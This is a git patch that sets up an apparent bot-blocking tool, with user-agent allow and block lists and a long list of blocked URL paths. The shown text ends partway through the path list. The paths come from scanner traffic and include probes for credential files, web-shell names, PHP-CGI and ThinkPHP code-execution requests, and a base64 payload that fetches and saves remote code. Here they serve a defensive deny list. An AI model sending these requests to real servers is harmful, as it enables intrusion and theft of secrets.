From 7c6d06354eaede3a5756b874b2b1dd72f780b4af Mon Sep 17 00:00:00 2001 From: notfire Date: Wed, 18 Sep 2024 13:18:25 -0400 Subject: [PATCH] init --- .gitignore | 3 + allowed-agents.txt | 1 + blocked-agents.txt | 50 ++ blocked-paths.txt | 1416 ++++++++++++++++++++++++++++++++++++++++++++ generate_config.py | 57 ++ 5 files changed, 1527 insertions(+) create mode 100755 .gitignore create mode 100755 allowed-agents.txt create mode 100755 blocked-agents.txt create mode 100755 blocked-paths.txt create mode 100755 generate_config.py diff --git a/.gitignore b/.gitignore new file mode 100755 index 0000000..87c44e5 --- /dev/null +++ b/.gitignore @@ -0,0 +1,3 @@ +robots.txt +access.log +output_config.txt \ No newline at end of file diff --git a/allowed-agents.txt b/allowed-agents.txt new file mode 100755 index 0000000..8123241 --- /dev/null +++ b/allowed-agents.txt @@ -0,0 +1 @@ +Mastodon \ No newline at end of file diff --git a/blocked-agents.txt b/blocked-agents.txt new file mode 100755 index 0000000..cc2d49e --- /dev/null +++ b/blocked-agents.txt @@ -0,0 +1,50 @@ +- +2ip +AdsBot-Google +AdsBot-Google-Mobile +AGATHA +ALittle Client +Amazonbot +APIs-Google +Applebot +Baiduspider +Barkrowler +bingbot +BLEXBot +bot +ChatGPT-User +Chrome Privacy Preserving Prefetch Proxy +claudebot +DataForSeoBot +DotBot +ev-crawler +facebookexternalhit +glitch.th +Go-http-client +Google-Extended +Google-InspectionTool +Googlebot-Image +Googlebot-News +Googlebot-Video +GoogleOther +GoogleOther-Image +GoogleOther-Video +GPTBot +http.rb +InternetMeasurement +l9scan +Mediapartners-Google +NetcraftSurveyAgent +paloaltonetworks.com +python-requests +Searcherxweb +SemrushBot +SeznamBot +Storebot-Google +SummalyBot +SurdotlyBot +Twitterbot +yacybot +YandexBot +YandexFavicons +ZoominfoBot \ No newline at end of file diff --git a/blocked-paths.txt b/blocked-paths.txt new file mode 100755 index 0000000..973be22 --- /dev/null +++ b/blocked-paths.txt @@ -0,0 +1,1416 @@ +/./InRelease +/./Packages.diff/Index +/./Packages.xz +/./Release.gpg +/./it_IT.bz2 +/.DS_Store +/.aws/config +/.aws/credentials +/.aws/credentials.gpg +/.docker/.env +/.docker/laravel/app/.env +/.env +/.env-example +/.env-sample +/.env.backup +/.env.bak +/.env.config +/.env.dev +/.env.dev.local +/.env.development.local +/.env.development.sample +/.env.dist +/.env.docker +/.env.docker.dev +/.env.example +/.env.local +/.env.prod +/.env.prod.local +/.env.production +/.env.production.local +/.env.project +/.env.sample +/.env.save +/.env.stage +/.env.travis +/.envrc +/.envs +/.env~ +/.git +/.git/ +/.git/HEAD +/.git/config +/.gitlab-ci.yml +/.gitlab-ci/.env +/.json +/.kube/config +/.local +/.production +/.remote +/.ssh/id_ecdsa +/.ssh/id_ed25519 +/.ssh/id_rsa +/.ssh/sftp-config.json +/.svn/wc.db +/.tmb/mariju.php +/.tmb/themes.php +/.tmb/users.php +/.tmb/warm.PhP7 +/.tmb/worm0.PhP7 +/.vscode/.env +/.vscode/settings.json +/.vscode/sftp.json +/.well-known/ +/.well-known//.well-known/owlmailer.php +/.well-known/about.php +/.well-known/acme-challenge/ +/.well-known/acme-challenge/1.php +/.well-known/acme-challenge/2index.php +/.well-known/acme-challenge/404.php +/.well-known/acme-challenge/LA.php +/.well-known/acme-challenge/aCxaa9.php +/.well-known/acme-challenge/about.php +/.well-known/acme-challenge/admin.php +/.well-known/acme-challenge/adminfuns.php +/.well-known/acme-challenge/agenda.php +/.well-known/acme-challenge/atomlib.php +/.well-known/acme-challenge/autoload_classmap.php +/.well-known/acme-challenge/bala.php +/.well-known/acme-challenge/bless.php +/.well-known/acme-challenge/bless1.php +/.well-known/acme-challenge/blurbs.php +/.well-known/acme-challenge/bs.php +/.well-known/acme-challenge/cl.php +/.well-known/acme-challenge/class.api.php +/.well-known/acme-challenge/class.api.php?p= +/.well-known/acme-challenge/class_api.php +/.well-known/acme-challenge/classwithtostring.php +/.well-known/acme-challenge/cloud.php +/.well-known/acme-challenge/cloud1.php +/.well-known/acme-challenge/cong.php +/.well-known/acme-challenge/content.php +/.well-known/acme-challenge/doc.php +/.well-known/acme-challenge/dropdown.php +/.well-known/acme-challenge/edit.php +/.well-known/acme-challenge/file.php +/.well-known/acme-challenge/fond.php +/.well-known/acme-challenge/gecko.php +/.well-known/acme-challenge/gif.php +/.well-known/acme-challenge/iR7SzrsOUEP.php +/.well-known/acme-challenge/index.php +/.well-known/acme-challenge/inputs.php +/.well-known/acme-challenge/install.php +/.well-known/acme-challenge/license.php +/.well-known/acme-challenge/makeasmtp.php +/.well-known/acme-challenge/mariju.php +/.well-known/acme-challenge/moon.php +/.well-known/acme-challenge/myip.php +/.well-known/acme-challenge/network.php +/.well-known/acme-challenge/options.php +/.well-known/acme-challenge/plugins.php +/.well-known/acme-challenge/radio.php +/.well-known/acme-challenge/samll.php +/.well-known/acme-challenge/sclass_api.php +/.well-known/acme-challenge/server.php +/.well-known/acme-challenge/settings.php +/.well-known/acme-challenge/shell.php +/.well-known/acme-challenge/shell20211028.php +/.well-known/acme-challenge/simple.php +/.well-known/acme-challenge/sx.php +/.well-known/acme-challenge/themes.php +/.well-known/acme-challenge/update.php +/.well-known/acme-challenge/upfile.php +/.well-known/acme-challenge/users.php +/.well-known/acme-challenge/w.php +/.well-known/acme-challenge/webdb.php +/.well-known/acme-challenge/worksec.php +/.well-known/acme-challenge/wp-atom.php +/.well-known/acme-challenge/wp-blog.php +/.well-known/acme-challenge/wp-load.php +/.well-known/acme-challenge/wp-login.php +/.well-known/acme-challenge/wp-signup.php +/.well-known/acme-challenge/wp-sigunq.php +/.well-known/acme-challenge/wso112233.php +/.well-known/acme-challenge/xl2023.php +/.well-known/acme-challenge/xmrlpc.php +/.well-known/acme-challenge/xmrlpc.php?p= +/.well-known/admin.php +/.well-known/apple-app-site-association +/.well-known/assetlinks.json +/.well-known/bala.php +/.well-known/change-password +/.well-known/cloud.php +/.well-known/discord +/.well-known/dropdown.php +/.well-known/fierzashell.php +/.well-known/file.php +/.well-known/gpc.json +/.well-known/index.php +/.well-known/makeasmtp.php +/.well-known/pki-validation/about.php +/.well-known/pki-validation/afnew.php +/.well-known/pki-validation/atomlib.php +/.well-known/pki-validation/class_api.php +/.well-known/pki-validation/cloud.php +/.well-known/pki-validation/file.php +/.well-known/pki-validation/iR7SzrsOUEP.php +/.well-known/pki-validation/index.php +/.well-known/pki-validation/ssl.php?xsec=blocker +/.well-known/pki-validation/sx.php +/.well-known/pki-validation/themes.php +/.well-known/pki-validation/wp.-.admin.php +/.well-known/pki-validation/x.php +/.well-known/pki-validation/xl2023.php +/.well-known/pki-validation/xmrlpc.php?p= +/.well-known/pkivalidation/bala.php +/.well-known/pkivalidation/shell20211028.php +/.well-known/pkivalidation/wso112233.php +/.well-known/privacy-sandbox-attestations.json +/.well-known/radio.php +/.well-known/related-website-set.json +/.well-known/resource-that-should-not-exist-whose-status-code-should-not-be-200/ +/.well-known/security.txt +/.well-known/shell20211028.php +/.well-known/sx.php +/.well-known/traffic-advice +/.well-known/warm.PhP7 +/.well-known/worm0.PhP7 +/.well-known/wp-2019.php +/.well-known/wp-cron.php?ac=3 +/.well-known/wp-load.php +/.well-known/wp-login.php +/.well-known/wso112233.php +/.well-knownold/bala.php +/.well-knownold/shell20211028.php +/.well-knownold/wso112233.php +/.wp-cli/wp-login.php +/.wp-themes.php +/.wp-themes.php7 +//.tmb/wp-login.php +//.well-known/acme-challenge/wp-login.php +//.well-known/pki-validation/wp-login.php +//2018/wp-includes/wlwmanifest.xml +//2019/wp-includes/wlwmanifest.xml +//2020/wp-includes/wlwmanifest.xml +//2021/wp-includes/wlwmanifest.xml +//blog/wp-includes/wlwmanifest.xml +//cdn.js +//cgi-bin/wp-login.php +//cms/wp-includes/wlwmanifest.xml +//core/extend/ueditor/themes/default/images/icons-all.gif +//e/data/images/arrow.gif +//feed/ +//images/wp-login.php +//includes/fckeditor/editor/filemanager/browser/default/images/icons/js.gif +//media/wp-includes/wlwmanifest.xml +//news/wp-includes/wlwmanifest.xml +//plus/img/df_dedetitle.gif +//public/img/top4.gif +//public/plugins/Ueditor/dialogs/attachment/fileTypeImages/icon_psd.gif +//shop/wp-includes/wlwmanifest.xml +//site/wp-includes/wlwmanifest.xml +//sitemap.xml +//sito/wp-includes/wlwmanifest.xml +//test/wp-includes/wlwmanifest.xml +//unpkg.com/splitting/dist/splitting.min.js +//web/wp-includes/wlwmanifest.xml +//website/wp-includes/wlwmanifest.xml +//wordpress/wp-includes/css/dashicons.min.css +//wordpress/wp-includes/wlwmanifest.xml +//wp-admin/css/wp-login.php +//wp-admin/images/wp-login.php +//wp-admin/includes/wp-login.php +//wp-admin/maint/wp-login.php +//wp-admin/network/wp-login.php +//wp-admin/user/wp-login.php +//wp-content/languages/wp-login.php +//wp-content/plugins/classic-editor/wp-login.php +//wp-content/plugins/fix/up.php +//wp-content/plugins/wp-login.php +//wp-includes/ID3/license.txt +//wp-includes/IXR/wp-login.php +//wp-includes/certificates/wp-login.php +//wp-includes/css/buttons.css +//wp-includes/css/dashicons.min.css +//wp-includes/customize/wp-login.php +//wp-includes/fonts/wp-login.php +//wp-includes/pomo/wp-login.php +//wp-includes/wlwmanifest.xml +//wp/wp-includes/wlwmanifest.xml +//wp1/wp-includes/wlwmanifest.xml +//wp2/wp-includes/wlwmanifest.xml +//xmlrpc.php?rsd +//zb_system/image/common/artikel.gif +/01.php +/032w4e.php +/054erfgh.php7 +/0x1949.php +/0z.php +/1234.php +/124.php +/1e4e0bbfced19dc10ed007e0b09a24a8.php +/345tyu.php +/403.php +/404.php +/444.php +/4pric.php +/504.php +/7D8B79A2-8974-4D7B-A76A-F4F29624C06BGaaJxd1AgkI4FVmRGCDCeu9T-Z2D8-5CSaSPF87YlhG13gZ79uJobm-xEBlW6Zv5DSCbb0xlKnx---0FXdWy1A/init?url=https%3A%2F%2Ftesting.duckwithsunglasses.com%2Femotiweb%2F&plugins=wnt%26wsm%26vs%26abn%26abn_shadow%26ua%26cb%26xhr_content&data=%7B%22data%22%3A%5B%7B%22plugin%22%3A%22wnt%22%2C%22parameters%22%3A%22%7B%5C%22referrer%5C%22%3A%5C%22%5C%22%7D%22%7D%2C%7B%22plugin%22%3A%22wsm%22%2C%22parameters%22%3A%22%7B%5C%22referrer%5C%22%3A%5C%22%5C%22%2C%5C%22stubId%5C%22%3A%5C%22%5C%22%7D%22%7D%2C%7B%22plugin%22%3A%22abn%22%2C%22parameters%22%3A%22%7B%5C%22isCssUrlInjected%5C%22%3Afalse%7D%22%7D%2C%7B%22plugin%22%3A%22abn_shadow%22%2C%22parameters%22%3A%22%7B%5C%22isCssUrlInjected%5C%22%3Afalse%7D%22%7D%2C%7B%22plugin%22%3A%22xhr_content%22%2C%22parameters%22%3A%22%7B%5C%22referrer%5C%22%3A%5C%22%5C%22%7D%22%7D%5D%7D&isTopLevel=true&nocache=117d7 +/934esd.php7 +/93eds.php +/98765rf.php +/9ae6a4d2ed2e7440928435fc8a2faade.php +/ALFA_DATA/ +/ALFA_DATA/alfacgiapi/ +/ALFA_DATA/alfacgiapi/afox.php +/ALFA_DATA/alfacgiapi/menu.php +/ALFA_DATA/alfacgiapi/perl.alfa +/ALFA_DATA/alfacgiapi/upfile.php +/Admin/lib/webuploader/0.1.5/server/preview.php +/BDKR28.php +/Controls/Ueditor//php/controller.php?action=catchimage +/Controls/Ueditor/net/controller.ashx?action=catchimage +/E3E8934C-235A-4B0E-825A-35A08381A191/abn/main.css?attr=aHR0cHM6Ly90ZXN0aW5nLmR1Y2t3aXRoc3VuZ2xhc3Nlcy5jb20vZW1vdGl3ZWIv +/FD126C42-EBFA-4E12-B309-BB3FDD723AC1/main.js?attr=GaaJxd1AgkI4FVmRGCDCeq1TcCX7-8D8vWsOt2oD8MhO3toEMIBTn9CXea2nDRBOvPmmznOIjzcftV7IDjFUsP5A5cugCrYRt79tLvWU8dQ +/FileZilla.xml +/M1.php +/Mshell.php +/MyAccount/index.php?m=login&a=test&aa%5B%5D=1&neme=copy&p1=https://xingzuo.zhlgch.compbcms.txt&c1=MWU0ZTBiYmZjZWQxOWRjMTBlZDAwN2UwYjA5YTI0YTgucGhw +/Office/index.php?m=login&a=test&aa%5B%5D=1&neme=copy&p1=https://xingzuo.zhlgch.compbcms.txt&c1=MWU0ZTBiYmZjZWQxOWRjMTBlZDAwN2UwYjA5YTI0YTgucGhw +/Plugin/uedit//php/controller.php?action=catchimage +/Plugin/uedit/net/controller.ashx?action=catchimage +/Plugin/ueditor//php/controller.php?action=catchimage +/Plugin/ueditor/net/controller.ashx?action=catchimage +/Public/Admin/webuploader/server/preview.php +/Public/admin/lib/webuploader/0.1.5/server/preview.php +/Public/home/js/check.js +/RxR.php?Fox=efjiq +/Scripts/uedit//php/controller.php?action=catchimage +/Scripts/uedit/net/controller.ashx?action=catchimage +/Scripts/ueditor//php/controller.php?action=catchimage +/Scripts/ueditor/net/controller.ashx?action=catchimage +/Ueditor//php/controller.php?action=catchimage +/Ueditor/controller.ashx?action=catchimage +/Ueditor/net/controller.ashx?action=catchimage +/WebUser/index.php?m=login&a=test&aa%5B%5D=1&neme=copy&p1=https://xingzuo.zhlgch.compbcms.txt&c1=MWU0ZTBiYmZjZWQxOWRjMTBlZDAwN2UwYjA5YTI0YTgucGhw +/_all_dbs +/_ignition/health-check +/_profiler/phpinfo +/_profiler/phpinfo.php +/a.php +/aaa9 +/aab9 +/about +/about.html +/about.php +/about.php7 +/about/function.php +/addons/admin/update.php?name=admin +/addons/caiji/update.php?name=admin +/addons/collect/update.php?name=admin +/addons/farcj/update.php?name=admin +/admin-ajax.php +/admin-app/.env +/admin-heade.php +/admin-post.php +/admin.php +/admin.php?action=beindex&password=sem2023&aver=PD9waHAgZmlsZV9wdXRfY29udGVudHMoJ292YXRvb2xzLnBocCcsIGZpbGVfZ2V0X2NvbnRlbnRzKCdodHRwczovL3VjZG8uZ3JvdXAvd3AtYWRtaW4vdS50eHQnKSkgPyBwcmludCAnc3VjY2Vzc2Z1bGx5ICcgOiBwcmludCAnRXJyb3InOyA/Pg==&fileplus=PD9waHAgZmlsZV9wdXRfY29udGVudHMoJ292YXRvb2xzLnBocCcsIGZpbGVfZ2V0X2NvbnRlbnRzKCdodHRwczovL3VjZG8uZ3JvdXAvd3AtYWRtaW4vdS50eHQnKSkgPyBwcmludCAnc3VjY2Vzc2Z1bGx5ICcgOiBwcmludCAnRXJyb3InOyA/Pg==&checkstring=PD9waHAgZmlsZV9wdXRfY29udGVudHMoJ292YXRvb2xzLnBocCcsIGZpbGVfZ2V0X2NvbnRlbnRzKCdodHRwczovL3VjZG8uZ3JvdXAvd3AtYWRtaW4vdS50eHQnKSkgPyBwcmludCAnc3VjY2Vzc2Z1bGx5ICcgOiBwcmludCAnRXJyb3InOyA/Pg== +/admin.php?p= +/admin/ +/admin/.env +/admin/.git/config +/admin/Ueditor//php/controller.php?action=catchimage +/admin/Ueditor/net/controller.ashx?action=catchimage +/admin/adminer.php +/admin/adminer/adminer.php +/admin/assets/uploadify/uploadify.css +/admin/controller/extension/extension/ +/admin/db/adminer.php +/admin/event/uploadimg.html +/admin/fckeditor/editor/filemanager/browser/default/browser.html +/admin/includes/general.js +/admin/mybdadmin/adminer.php +/admin/mybdadmin/adminer/adminer.php +/admin/public/js/uploadify/uploadify.css +/admin/register +/admin/ueditor/net/controller.ashx?action=catchimage +/admin/upload/css.php +/admin/uploadify/uploadify.css +/admin/view/javascript/common.js +/adminer.php +/adminer/adminer.php +/adminfuns.php +/adminfuns.php7 +/administrator/ +/administrator/help/en-GB/toc.json +/administrator/index.php +/administrator/language/en-GB/install.xml +/ads.txt +/ae.php +/ajax-actions.php +/al.php +/album.cgi +/alfa-priv.php +/alfa-rex.php +/alfa-rex.php7 +/alfa-rex2.php7 +/alfa.php +/alfa2.php +/alfacgiapi/perl.alfa +/alfadheat.php +/alfanew.PHP7 +/alfanew.php +/alfanew.php7 +/alfanew2.php7 +/aoii.php +/api/.env +/api/index.php/v1/config/application?public=true +/app-ads.txt +/app/.env +/app/.git/config +/app_dev.php/_profiler/open?file=app/config/parameters.yml +/app_dev.php/_profiler/phpinfo +/apple-touch-icon-precomposed.png +/application/.env +/application/.git/config +/application/configs/application.ini +/apps/.env +/apps/guestbook +/appsettings.json +/as.php +/asdf.php +/aska.cgi +/assets/ +/assets/css/403.php +/assets/fire_admin/images/logo.png +/assets/images/1p.php +/assets/img/favicon.png +/assets/img/icon/log1.png +/assets/js/uploadify/uploadify.css +/assets/plugins/filemanager/dialog.php +/assets/uploadify/uploadify.css +/atom.xml +/atomlib.php +/authorize.php +/auto_seo.php +/autoload_classmap.php +/avaa.php +/aws.yml +/b0.php +/backend/.env +/backup +/backup.sql +/backup.tar.gz +/backup.zip +/backup/ +/backup_02012022.tar +/backup_03012022.tar +/backup_04012022.tar +/backup_05012022.tar +/backup_06012022.tar +/backup_07012022.tar +/bak +/bak.php +/bala.php +/bbs.cgi +/bc +/bd/adminer.php +/becks.php +/beta/.env +/bk +/bkp +/bless.php +/blog +/blog.php +/blog/wp-admin/setup-config.php?step=1 +/blog/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282 +/bonfjrdq.php?Fox=d3wL7 +/byp.php +/bypass.php +/cache-compat.php +/caxgpckc.php?Fox=d3wL7 +/cb989.php +/ccx/index.php +/cfide/scripts/ajax/fckeditor/editor/filemanager/browser/default/browser.html +/cgi-bin/404.php +/cgi-bin/about.php +/cgi-bin/cgi-bin/about.php +/cgi-bin/cgi-bin/about.php7 +/cgi-bin/class_api.php +/cgi-bin/cloud.php +/cgi-bin/file.php +/cgi-bin/iR7SzrsOUEP.php +/cgi-bin/index.php +/cgi-bin/inputs.php +/cgi-bin/install.php +/cgi-bin/moon.php +/cgi-bin/php-cgi?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input +/cgi-bin/php.cgi?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input +/cgi-bin/php?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input +/cgi-bin/radio.php +/cgi-bin/sx.php +/cgi-bin/themes.php +/cgi-bin/users.php +/cgi-bin/wp-login.php +/cgi-bin/xmrlpc.php +/cgi-bin/xmrlpc.php?p= +/chosen +/chosen.php +/chosen.php?p= +/cjfuns.php +/class-IXR-date.php +/class.api.php +/class_api.php +/classsmtps.php +/classwithtostring.php +/client.do +/cloud-config.yml +/cloud.php +/cms/manage/admin.php?m=manage&c=background&a=action_flashUpload +/color.php +/comfunctions.php +/config.js +/config.json +/config.php +/config.xml +/config.yaml +/config.yml +/config/.git/config +/config/aws.yml +/config/config.json +/config/database.php +/config/production.json +/configNRB/admin.php +/cong.php +/cong.php?p= +/contact.html/ +/contact.php +/content.php +/content/Ueditor//php/controller.php?action=catchimage +/content/Ueditor/net/controller.ashx?action=catchimage +/controller.ashx?action=catchimage +/core +/crm/.env +/css.php +/css/ +/css/023wesd.php +/css/cloud.php +/css/iR7SzrsOUEP.php +/css/index.php +/css/install.php +/css/sgd.php +/css/themes.php +/css/xmrlpc.php?p= +/dashboard/phpinfo.php +/database.sql +/database/adminer/adminer.php +/db.php +/db/admin/adminer.php +/dbadmin/adminer.php +/debug/default/view?panel=config +/dede +/default.asp +/defaults.php +/defaults.php?p= +/demo/.env +/details/images/favicon.ico +/dev +/dev/.env +/dev2 +/development/.env +/dfgsfkgjsdflgsdjfkg +/dist/gsap.min.js +/doc.php +/docker-compose.yml +/doors-test-article +/doors-test-article/ +/dropdown.php +/dump.sql +/e/data/ecmseditor/infoeditor/plugins/smiley/images/angel_smile.png +/e/data/js/jscolor/hs.png +/ebs.php7 +/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application +/edit-comments.php +/edit-form-advanced.php +/edit.php +/editor/Ueditor//php/controller.php?action=catchimage +/editor/Ueditor/net/controller.ashx?action=catchimage +/ee.php +/elfinder +/elfinder/php/connector.minimal.php +/env.js +/eqkexbuj.php?Fox=d3wL7 +/ern1.PhP7 +/etc/shadow +/etc/ssl/private/server.key +/f77.php +/fart/products/ +/favicon-16x16.png +/favicon-32x32.png +/fb +/fckeditor/editor/filemanager/browser/default/browser.html +/fckeditor/editor/filemanager/connectors/php/upload.php?Type=Media +/feed +/feed/ +/file.php +/filefuns.php +/filemanager.php +/filemanager/dialog.php +/files/ +/files/index.php +/fileupload/index.php?file=tf2rghf.jpg +/fix/Public/Webuploader/server/preview.php +/fm.php +/fm1.php +/function.php +/function.php?p= +/function/function.php +/fw.php +/g.php +/g_book.cgi +/gaestebuch.php +/gastenboek.php +/gawean.PhP7 +/gb.php +/gbook/ +/gbook/?18_1.html +/gbook/gbook.php/ +/gbook/gbook.php?a=viewIP&num=0 +/gecko.php +/gel4y.php +/gelay.php +/gf.php +/gif.php +/gix.php +/glpi/vendor/network.php +/go/?dir=members... +/goaccess/ +/goods.php +/google.php +/google645a6f5e8db9a895.html +/googleca4473778a6eb9ce.html +/guestbook +/guestbook.html +/guestbook.php +/hack/ +/heardle/ +/heex.php +/helpdesk//vendor/htmlawed/htmlawed/gel4y.php +/helpers/utility.js +/home +/home.html/robots.txt +/home.html/sitemap.xml +/home.php +/home/.env +/homeroot.php +/html/js/editor/fckeditor/editor/filemanager/browser/default/browser.html +/humans.txt +/i.php +/iR7SzrsOUEP.php +/iegbnbts.php?Fox=d3wL7 +/images/ +/images/about.php +/images/class.api.php +/images/cloud.php +/images/cyberchef-128x128.png +/images/default.png +/images/editor/separator.gif +/images/file-128x128.png +/images/file-32x32.png +/images/fork_me.png +/images/iR7SzrsOUEP.php +/images/inputs.php +/images/loadinglit.gif +/images/log1.png +/images/mar.php +/images/pc/logo.png +/images/xmrlpc.php?p= +/img/023wesd.php +/img/about.php +/img/cloud.php +/img/embed.png +/img/xmrlpc.php?p= +/imgs/logox.png +/include.php +/include/ckeditor/images/addon.gif +/include/dialog/select_images_post.php +/include/dialog/select_templets_post.php +/includes/updates.php +/index.php +/index.php/Index//think/app/invokefunction +/index.php/component/users/?view=registration +/index.php/home/Forum/index?model=Forum&temp=Public/Home/css/weiphp.css +/index.php/module/action/param1/$%7B@print(md5(chaonan))%7D +/index.php?%25ADd+allow_url_include%3D1+%25ADd+auto_prepend_file%3Dphp://input +/index.php?3x=3x +/index/function.php +/indexbak.php +/inex.php?s=%5Cthink%5Capp/invokefunction&function=assert&vars%5B0%5D=print%20md5(%27chaonan%27)&vars%5B1%5D%5B%5D=1 +/info +/info.php +/info/ +/infophp.php +/infos.php +/ini.php +/input.php +/inputs.php +/install.php +/installer.php +/ioxi-rex.php +/ioxi2.php +/jax_guestbook.php +/js/ +/js/header-rollup-554.js +/js/ueditor/net/controller.ashx?action=catchimage +/js/uploadify/uploadify.css +/kyc/.env +/laravel/.env +/laravel/core/.env +/layout.css.php +/leaf-mailer.php +/lib/webuploader/0.1.5/server/preview.php +/libraries/legacy/updates.php +/libraries/phpmailer/updates.php +/libraries/vendor/updates.php +/libraries/wp.-.admin.php +/license.php +/light.cgi +/link.php +/linusadmin-phpinfo.php +/list +/live_env +/ll.php +/lmjydiys.php?Fox=d3wL7 +/local/.env +/lock.php +/lock360.php +/log.php +/login +/login.action +/login.php?s=Admin/login +/login?pp=enable&pp=env +/logs/updates.php +/lol.php +/lufix.php +/lv.php +/m4r1ju4n4.php +/mah.php +/mah/function.php +/mail.php +/mailer.php +/mailer/.env +/main +/maint/class.api.php +/makeasmtp.php +/makeasmtp.php?p= +/manage/webuploader/preview/preview.php +/manager/Ueditor//php/controller.php?action=catchimage +/manager/Ueditor/net/controller.ashx?action=catchimage +/manifest.json +/mariju.php +/marijuana.php +/media.php +/media/system/js/core.js +/member/ +/member/success.aspx +/menu-header.php +/million.php +/mini.php +/misc/ajax.js +/modules.php?name=Your_Account +/modules/simpleimportproduct/index.php +/moon.php +/ms-sites.php +/ms.php +/msl.php +/mybdadmin/adminer.php +/new +/new/ +/newsite +/nice.php?p= +/npaqheia.php?Fox=d3wL7 +/oanrfysr.php?Fox=d3wL7 +/obfs.php +/officialsite +/ok.php +/old +/old-website +/old/ +/old/function.php?p= +/old_phpinfo.php +/options-reading.php +/options.php +/orphans +/outpull.php +/ova-tools.php +/ovatools.php +/owl.php +/owl22.php +/oxi-rex.php +/packages/barryvdh/elfinder/js/elfinder.min.js +/php-info.php +/php_info +/php_info.php +/phpinfo +/phpinfo.php +/phpinfo.php3 +/phpinfo.php4 +/phpinfo.php5 +/phpinfos.php +/phpipatest/ipa/zigzag.ipa +/phpmailer.lang-sv.php +/phpsso_server/statics/images/logo_1.gif +/phpversion.php +/pi.php +/pinfo.php +/plugin.php +/plugins.php +/plugins/ +/plugins/filemanager/dialog.php +/plugins/system/debug/debug.xml +/plugins/updates.php +/plugins/uploadify/uploadify.css +/portfolio/img/Noise.gif +/portfolio/img/behance.jpg +/post.php +/prevlaravel/sftp-config.json +/prod/.env +/public/.env +/public/client/planinfo +/public/static/admin/images/ok.png +/public/static/common/images/file.png +/public/webuploader/server/preview.php +/pvhyeovs.php?Fox=d3wL7 +/qfdiwdzu.php?Fox=d3wL7 +/radio.php +/random/favorite-albums.html +/random/hashpipe.html +/random/rb4-stems.html +/raptv +/raptv/ +/readme.php +/recent-changes +/register +/rendixd.php +/repeater.php +/res-content/uploads/2018/11/81936297501704dd985e8ce84cb4a844.png +/rest.php +/revision.php +/rqfcfqew.php?Fox=d3wL7 +/s/032323e2130323e27363e2237313/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties +/s/033313e2237313e27363e2237313/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties +/s/134313e20393e21323e2430313/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties +/s/1383e20333e21323e2430313/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties +/s/33e27393e2431313e2838313/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties +/scarbook.php +/schallfuns.php +/search/label/PHP-Shells +/secrets.json +/security.txt +/sellers.json +/sendgrid.env +/seo-joy.cgi +/server +/server-status +/server.key +/services.html/ +/settings/index.html +/sftp-config.json +/sftp.json +/sgd.php +/shared/.env +/shell.php +/shell/AnonymousFox-shell?s=ninja+shells +/shell20211028.php +/simple.php +/site/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282 +/sitemap +/sitemap.txt +/sitemap.xml +/sitemap.xml.gz +/sitemap_index.xml +/sitemaps.xml +/sites/all/libraries/elfinder-1.1/connectors/php/connector.php +/sites/all/libraries/elfinder-1.1/src/connectors/php/connector.php +/sites/all/libraries/elfinder-1.2/connectors/php/connector.php +/sites/all/libraries/elfinder-1.2/src/connectors/php/connector.php +/sites/all/libraries/elfinder/php/connector.minimal.php +/sites/all/libraries/elfinder/php/connector.php +/sites/default/files/ +/smaxx.php +/smtp.php +/sql/adminer.php +/ss.php +/st.php +/staging +/staging/.env +/standalone/babel.min.js +/static../.git/config +/static/Admin/lib/webuploader/0.1.5/server/preview.php +/static/admin/javascript/hetong.js +/static/admin/lib/webuploader/0.1.5/server/preview.php +/static/common/editor//php/controller.php?action=catchimage +/static/common/ueditor//php/controller.php?action=catchimage +/static/common/user/uedit/net/controller.ashx?action=catchimage +/static/common/user/uedit/php/controller.php?action=catchimage +/static/common/user/ueditor/net/controller.ashx?action=catchimage +/static/common/user/ueditor/php/controller.php?action=catchimage +/static/image/logo2.png +/static/images/nopic.png +/static/picture/2021-05-1812.png +/static/picture/logo_jg2.png +/statics/abc/images/tu/abcpppin_03.png +/statics/admin/webuploader/0.1.5/server/preview.php +/statics/images/admin_img/logo_1.gif +/style.php +/sweet-pomegranate/cache/plugins.php +/sx.php +/symfony/_profiler/phpinfo +/telescope/requests +/temp.php +/temp/ +/template/default/images/user.png +/templates/beez3/wp.-.admin.php +/templates/protostar/updates.php +/test +/test.php +/test/ +/test/.env +/testfront/portfolio/ +/testing +/thecube/script.js +/theme/Bob-Theme-Argon/favicon.ico +/theme/assets/fileupload/index.php?file=tf2rghf.jpg +/themes.php +/themes/custom/ahaspeed/favicon.ico +/thoms.php +/thumb/ +/ticket/vendor/htmlawed/htmlawed/gel4y.php +/tidzgvss.php?Fox=d3wL7 +/time.php +/tinyfilemanager.php +/tinyfilemanager/tinyfilemanager.php +/tj/tongjis.php?assert-phpinfo() +/tong/tongjis.php?assert-phpinfo() +/tongj/tongjis.php?assert-phpinfo() +/tongji/tongjis.php?assert-phpinfo() +/top.php?action=door123 +/txpro/img/html_icon.ico +/uedit/net/controller.ashx?action=catchimage +/uedit/php/controller.php?action=catchimage +/ueditor/controller.ashx?action=catchimage +/ueditor/net/controller.ashx?action=catchimage +/unsets.php +/updates.php +/upfile.php +/upload.php +/uploadify/uploadify.css +/uploads/ +/user.php +/user/swfupload.asp +/user_secrets.yml +/users.php +/userscripts/genius-reverter.js +/v2/_catalog +/vendor/ +/vendor/laravel-filemanager/js/cropper.min.js +/vendor/phpunit/phpunit/build.xml +/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php +/view-source: +/viewport/portfolio/ +/web.config +/web/.env +/web/libraries/legacy/updates.php +/webdb.php +/weso.php +/woh.php +/wong.php +/wordpress +/wordpress-6.4.3-zh_CN/wordpress/wp-admin/setup-config.php?step=1 +/wordpress/ +/wordpress/wp-admin/setup-config.php?step=1 +/wordpress/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282 +/wordpress/wp-includes/IXR/allez.php +/worm0.PhP7 +/wp +/wp-2019.php +/wp-22.php +/wp-aa.php +/wp-activate.php +/wp-admin/ +/wp-admin/.well-known/upfile.php +/wp-admin/023wesd.php 